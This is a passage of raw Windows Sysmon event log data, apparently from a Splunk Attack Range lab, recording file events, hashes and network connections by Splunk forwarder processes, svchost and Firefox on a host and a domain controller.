Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.417{0C1E0330-F78C-60EB-CD79-00000000D001}3856C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:28.182{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=55618E78E56C3978AEAEDF790197A2AC,SHA256=EC0529CEFEE353DA19E229409F992547549BA6E58BB6D945AB1128BA64CA5321,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:19.779{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61922-false10.0.1.12-8000- 23542300x8000000000000000809823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:29.916{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AC3B74FEFB45075EE876564317C576E,SHA256=B9E4D795AD16EE7A7F64866FE4FCC41BACA55C7F72315F581A002355FA52ABB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053398Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:29.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4AC412A9F9F6AD578BE9C928A3FC1F66,SHA256=B159884AA0D341EFDD0F134640F177BA0FF4A3ACCB5F413B10276536EEFAA8C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:29.171{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F44F113C2B31C146F592AA1821E6468,SHA256=6A90C968A4F503A706FD08932DD459135934117FEBF8D53049066490E814B087,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:29.448{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=577EBB065E05EF8ADA573E7A6FA9DA54,SHA256=016156C4C88CCCC5A426F7DFC692BB5BE5AA16614AC3D1AD1F1B80E7D029B1CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:30.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=760983370FC81C5DF23BDA6CDB418BCF,SHA256=733D2DCEB6F19C8BE937FE3CBCB21C8483A12921510753151EFE45BF54BEF646,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053399Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:30.185{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80EBF5CCE5B97305985D97EC9679DE90,SHA256=C60736548241024FB3694008A5E504DEC90C27B1CA65B762ECED668915E6DA61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:30.182{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=6E0899461F30233E09779195062308E9,SHA256=CA8C854F2A46286EAAC41BAEDC6002586E08003C6B605EF8E6813F741FF29889,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809827Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:31.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A1404776E9DD5C458EAB841DC6596E,SHA256=1A1D6453E03DF4DA4D00D73C228EEF4C453C8F54FD5B1FE670E5EB71D736A5E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053401Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:24.367{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-55177-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001053400Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:31.216{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D293B9D12251B4A796BC17AEEE8E520C,SHA256=E1793B4FC091E438DC70DA075BE8F3DD94CFD74A69A2B194C2D0DCA720BC6668,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:29.394{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57421-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809828Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:32.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B735EF0FD3E44C361EF047D73EC0B0A,SHA256=161BFF0499D336705516CB4D5F9FC5DE2F2301F37520BB1152EF78FDF58DC155,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:32.231{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=784E4C5095CFDEA47EBA36B6C51666EF,SHA256=B0DFB2241D92AD0024C6AF1D8BF7A55BC181AF557357A4DB85345B94F6E94679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:32.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D95779BEDF73FB21CEEC72DCB39FA773,SHA256=999EBA53109334C2C714FF065EBA50947F5F008F905397BDC9838BC3B0E01AF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053402Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:32.168{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4E7906528823500EB8FD9BB432C2EBB,SHA256=B94787A6F89A0D11D0FD9893FF4FBDA668D5479F35CE68FCC49C8D18E7E6604F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809829Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:33.948{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=481BF66D36C5258EFF994EBBBD8E9A7D,SHA256=6E44A3D064CA08C0505349C6E0629E70E3A10817B4FB99CB8F1D95888A911948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:33.248{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E30E625D5C3129949FEF1494674252F5,SHA256=08988825FC257E027A645C057CE30607ABC12C52BCE5F86D118738C500345B1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809830Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:34.951{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD63D6AFF9208ABA6EFB646D70F4DD2,SHA256=1F33ED12530C8188A6F5AC6E613E163E6B5211494E5E6BFF24E841FF4E9641E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:34.267{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0B05E7B788C7A0C1C5B1F9FEEE513AB,SHA256=8CA145EFA0FAEBCC840CB50FF427E738FFED15E651244712EA3D1FA2CE052E82,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:25.577{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61923-false10.0.1.12-8000- 23542300x80000000000000001053408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:35.268{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B84B65A1E4A49D65BFE1CBA40E3E7540,SHA256=2A7F1022C0EF7712EBDB49B0CD008ABEC9E1A5E103E1601B02FE0DD5F1BBDCD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.281{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C81231BF49A6CF7B7B7E0A66CBC9FD8,SHA256=ACEC379EDFDDF89BF2A46A344ECACAE14D979BE4A71413DBB98FC006E1F4BA4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:35.193{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57422-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:35.998{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=806B859A973F578F24093BA2678BBC36,SHA256=C0A37EE7CF065E792DBF12BDED84E21F88AE80F6A3DDC2A794529DBE83C23C61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=35028B573B7806FE2007DE111522CBC1,SHA256=D9859AA85BE09A19B0270E4E67D68C7FDA8EADE74DD4847D054677855ECD5ADC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1E68FDB428A44158BDCB06577CDB63F3,SHA256=2E0F02974DE937805B4FBF485699E7B24111A44D92B20AA708609EF72AC7354C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CAABA6F6A3ECDA8DC939F1A8310E488D,SHA256=C177DF108D7FD2DA1981475BEC3CCC214A2517353BCC3CAA4E691E4CEFE505BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=755B5D9CC72AA5D4144086D9D80A7D75,SHA256=508585F2DFE4CD5144E8EF5EDDCBB951CE54909B91A89BCF2187EA0CEBE0B775,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B1592BA0EA24A68CAF79A75BF9739113,SHA256=C5D1D59EA5BF145DEC5EE396127CAC5937A559F0DB44E5F3CC4C635B35C10325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7BB658E2BEA922C157F0EB098DE93EBF,SHA256=10AAF263DF95E3FCCA6B32D37E03E19A7CA5C3371C4EAEBEBE631CFF8959A46D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9CADDD29793EE53CFB4D8735227A23DC,SHA256=F76F56D0A7D3CE0684E843EEBE1F902A8823250F989646FE15C1FFA771FA174B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=023AAFE8DAE1CE83443C60C87495CA1E,SHA256=F0791393597B7A5D18BCDC3950510082193EBA670324595A73A1F963007F2A6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1EFE4F21C6E26B6DBE394B2A4BBE04EA,SHA256=B10D8DB462805E95E478E2725D60CD36B6B462810C8942A279A7506A866315D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75E3A62AA82D3B3F9BAA4D1A5B8CCD73,SHA256=9EF4BE6888E154647B131C7C64A313FC27D749D8AADE15C370CD63842C588F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.013{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8B2321C63E45688CD01AF6636D56A66D,SHA256=55ED74CDBC318611EA74D01909592B9744ED0D68AFECB59EA18FD35375F30EC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:37.296{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B591108C605F212359AC85CE97266CD1,SHA256=F6CA7A0F2C2CE7108032C864BDF44F149C9B5B77C8B25E25C9448E33979AEF2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:37.013{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E2B14ACE5CC3077BDB2B3884225AE1,SHA256=8F5340C62F0F5E5D02DB4EEBF41A520725D49F14AF735A464F657A8A6D266B70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:38.645{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CB0507ACECB304211DCE14DC0FDC6427,SHA256=EC81A3537AD8ADF3B4CAF56E53A720FCC313A414FF6A77F8B9665D3219BA9FE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:38.296{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5757E68744933B3770BC93FCD940435,SHA256=2222D61327740A682F95DF8F01748F2C2805C530358D66297923CCEBC4CE56E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:38.029{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E78988A6F651EA12433BFA965207F9E,SHA256=54E76FA209DC8BED54D2A1D3B144DFC80A11DDBC0ECC78B190372E0F3E497519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:39.311{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0BDFF428F22B75C25121F13CE46EFA0,SHA256=5E840DD35C3EC8E7169DA81F5047173AAD39A1982CD5A4A8CEF1D8D259208C6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:39.029{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=894F34A84D54E00F0566347072D10CDE,SHA256=310A4828A4FBA7FF570F1D0A857B30E7096AF09598B5ECD258C9CBF3433B0BE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:40.315{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35C0664EFA3967AF03AE42459F97B233,SHA256=CE1BAF4D69BD6506326E2EB7B3A7B297351BECF2A2F2F7BFBCE4330415B72A11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:40.045{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=734AFAB180C6ECD2484320BB836E1F38,SHA256=105C9C4F8F2BFAA102531AACEB0BCC88A24455F314D1DE468AE98C6B2E29BB29,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:31.596{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61924-false10.0.1.12-8000- 23542300x80000000000000001053438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.329{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C963413861309C09762C517163C83C3F,SHA256=1FD256AAAE3EBD801824AC709BA1319C348ED3CA0B3353FE00EB8149B7399D2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:40.209{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57423-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:41.060{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5F9B21DC72E0F97A6E6A00B16668632,SHA256=33EF0027422B5266FA687917BCAA19D3EF0362E5373882FB95286A430F7144FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.045{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 